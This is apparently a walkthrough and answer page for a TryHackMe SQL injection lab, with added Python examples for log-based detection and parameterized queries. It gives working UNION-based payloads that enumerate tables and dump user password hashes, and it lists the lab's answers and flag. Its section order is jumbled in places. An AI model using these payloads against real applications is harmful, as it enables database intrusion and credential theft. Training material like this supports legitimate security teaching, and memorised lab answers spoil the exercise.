TryHackMe SQL Injection Lab Answers
The TryHackMe SQL Injection lab covers various techniques for exploiting database vulnerabilities. Below are the key steps and answers for the different tasks found within the room.
1. Finding the Vulnerability
The first step is identifying where the application interacts with the database. Look for URL parameters like ?id=1. Inject a single quote (') to trigger an error.
A database error message confirms the input is not being sanitized.
2. Determining Column Count
To perform a UNION-based attack, you must know how many columns the original query returns. Use the ORDER BY clause incrementally. Payloads: ' ORDER BY 1--, ' ORDER BY 2--, and so on.
If ORDER BY 4-- works but ORDER BY 5-- fails, the query returns 4 columns.
3. Extracting Database Information
Once the column count is known, use UNION SELECT to retrieve data.
Database Name: ' UNION SELECT 1,2,database(),4--
Database Version: ' UNION SELECT 1,2,version(),4--
Current User: ' UNION SELECT 1,2,user(),4--
4. Enumerating Database Structure
In many SQL environments, metadata can be accessed to understand the structure of the database.
Table Enumeration: This involves querying schema information to identify the names of the tables that exist within the database.
Column Discovery: Once a table of interest is identified, the next step is determining the names of the columns within that table to understand what data is stored.
5. Data Retrieval and Flags
The final stage of the lab involves using the established UNION query to pull specific information from the identified tables. In the context of TryHackMe, this usually involves locating a specific "flag" string.
Methodology: Combine the column names and table names discovered in the previous steps into a final UNION SELECT statement.
Goal: Successfully display the contents of the target fields on the webpage to capture the flag required for the task.
6. Mitigation and Prevention
Understanding how to exploit these vulnerabilities is the first step toward preventing them.
Parameterized Queries: Use prepared statements so that user input is never interpreted as SQL command logic.
Input Validation: Implement strict allow-lists for user input.
Principle of Least Privilege: Ensure the database user account used by the application has the minimum permissions necessary.
Lab Completion Tips 💡
Check Syntax: Ensure comments like -- or # are used correctly to neutralize the remainder of the original SQL query.
Data Types: When using UNION, the data types in the injected columns must match the data types in the original query.
Stay Ethical: These techniques are intended for authorized security testing and educational purposes only.
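The probing sequence described in steps 1 to 4 (a single quote that produces a server error, incremental ORDER BY, UNION SELECT, information_schema lookups) is also what a defender sees in web server logs. The following is an added example, not part of the lab or this page, that runs simple stage detection over constructed access-log lines. The log lines, IP addresses, timestamps and signature names are all made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Common Log Format; not taken from the lab or the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /products?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /products?id=1' HTTP/1.1" 500 88
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /products?id=1'%20ORDER%20BY%204--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /products?id=1'%20UNION%20SELECT%201,group_concat(table_name),3%20FROM%20information_schema.tables--%20- HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=order%20form HTTP/1.1" 200 300
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \d+$'
)

# One signature per stage of the walkthrough; names are this example's own labels.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),  # step 3
    ("order_by_probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),          # step 2
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),           # step 4
    ("sql_comment", re.compile(r"--(\s|$)|#")),                              # query terminator
]


def classify(line):
    """Parse one log line and return its fields plus the list of matched stages."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["path"])  # signatures run on the decoded request path
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    # Step 1 of the walkthrough: a quote in the input that makes the server error out.
    if "'" in decoded and m["status"] == "500":
        hits.append("quote_error_probe")
    return {"ip": m["ip"], "ts": m["ts"], "path": decoded,
            "status": int(m["status"]), "hits": hits}


def find_suspicious(log_text):
    """Return only the requests that matched at least one stage."""
    events = (classify(l) for l in log_text.splitlines() if l.strip())
    return [e for e in events if e and e["hits"]]


def escalating_sources(events, min_stages=2):
    """Group events by client IP and keep clients that hit min_stages or more distinct stages."""
    stages = {}
    for e in events:
        stages.setdefault(e["ip"], set()).update(e["hits"])
    return {ip: sorted(s) for ip, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    found = find_suspicious(SAMPLE_LOG)
    for e in found:
        print(e["ts"], e["ip"], e["status"], e["hits"], e["path"])
    print("escalating:", escalating_sources(found))
```

The benign search for "order form" is included on purpose: the ORDER BY signature requires a preceding quote and a numeric position, so ordinary words in a query string do not trigger it. Grouping by source and counting distinct stages separates a one-off quote in a form field from a client walking through the whole methodology.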
Task 2 – What is SQL Injection?
Q1: What statement is used to retrieve data from a database?
Answer: SELECT
Q2: What character comments out the rest of a SQL query?
Answer: -- (or #)
Solution
Step 1: Use the following payload to dump the table data:
' UNION SELECT NULL,NULL,NULL FROM users -- -
The response will contain the table data.
Conclusion
In this lab, we explored how to identify and exploit SQL injection vulnerabilities. We covered basic SQL injection, union-based SQL injection, error-based SQL injection, and blind SQL injection. By completing these challenges, you have gained hands-on experience in detecting and exploiting SQL injection vulnerabilities.
Step 1: Identifying the Vulnerability
The application uses a SQL query to retrieve employee data:
SELECT * FROM employees WHERE id = '$id';
The $id variable is taken directly from user input and concatenated into the query, which makes it vulnerable to SQL injection attacks.
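The query above and the mitigations in section 6 (parameterized queries and input validation) can be seen side by side in the following added example, which is not code from the lab or this page. It uses Python's sqlite3 module with a constructed in-memory database: the interpolated query accepts the lab's UNION payload and errors on a lone quote, while the bound-parameter version treats the same strings as plain data. Table names, rows and the hash placeholder are all constructed for the example; least privilege is not shown because SQLite has no per-user grants.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema standing in for the lab's application database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-placeholder');
    """)
    return conn


def search_vulnerable(conn, product_id):
    """Same shape as the page's query: the value is spliced into the SQL text,
    so whatever the user sends becomes SQL syntax."""
    query = f"SELECT id, name, price FROM products WHERE id = '{product_id}'"
    return conn.execute(query).fetchall()


def search_parameterized(conn, product_id):
    """Prepared statement: the driver sends the value separately from the
    statement, so quotes and keywords inside it are data, never SQL."""
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()


def search_validated(conn, raw_id):
    """Allow-list validation on top of binding: an id must be a decimal integer."""
    if not (isinstance(raw_id, str) and raw_id.isdigit()):
        raise ValueError("product id must be a positive integer")
    return search_parameterized(conn, int(raw_id))


def raises_db_error(conn, fn, value):
    """True if the query fails with a database error for this input (the
    'single quote triggers an error' signal from step 1)."""
    try:
        fn(conn, value)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    conn = make_db()
    payload = "1' UNION SELECT id, username, password FROM users -- -"
    print("interpolated, quote probe errors:", raises_db_error(conn, search_vulnerable, "'"))
    print("interpolated, union payload:", search_vulnerable(conn, payload))
    print("parameterized, quote probe errors:", raises_db_error(conn, search_parameterized, "'"))
    print("parameterized, union payload:", search_parameterized(conn, payload))
    print("validated, normal id:", search_validated(conn, "2"))
```

The two failure signals the lab teaches you to look for (an error on a quote, extra rows from a UNION) both disappear with parameter binding alone; the allow-list adds a second layer that rejects malformed ids before they reach the database and gives the application a clean place to log them.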
Task 4 – In-band SQLi (Union-based)
Lab: Search products by ID
Step 1 – Find number of columns:
' ORDER BY 1 -- - (increase until error)
Columns found: 3
Step 2 – Union payload:
' UNION SELECT 1,2,3 -- -
Q1: What table name holds user credentials?
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() -- -
Answer: users
Q2: What is the admin password hash?
' UNION SELECT 1,group_concat(password),3 FROM users -- -
Answer: 5f4dcc3b5aa765d61d8327deb882cf99
Q3 (flag):
Answer: THMUnion_Based_SQLi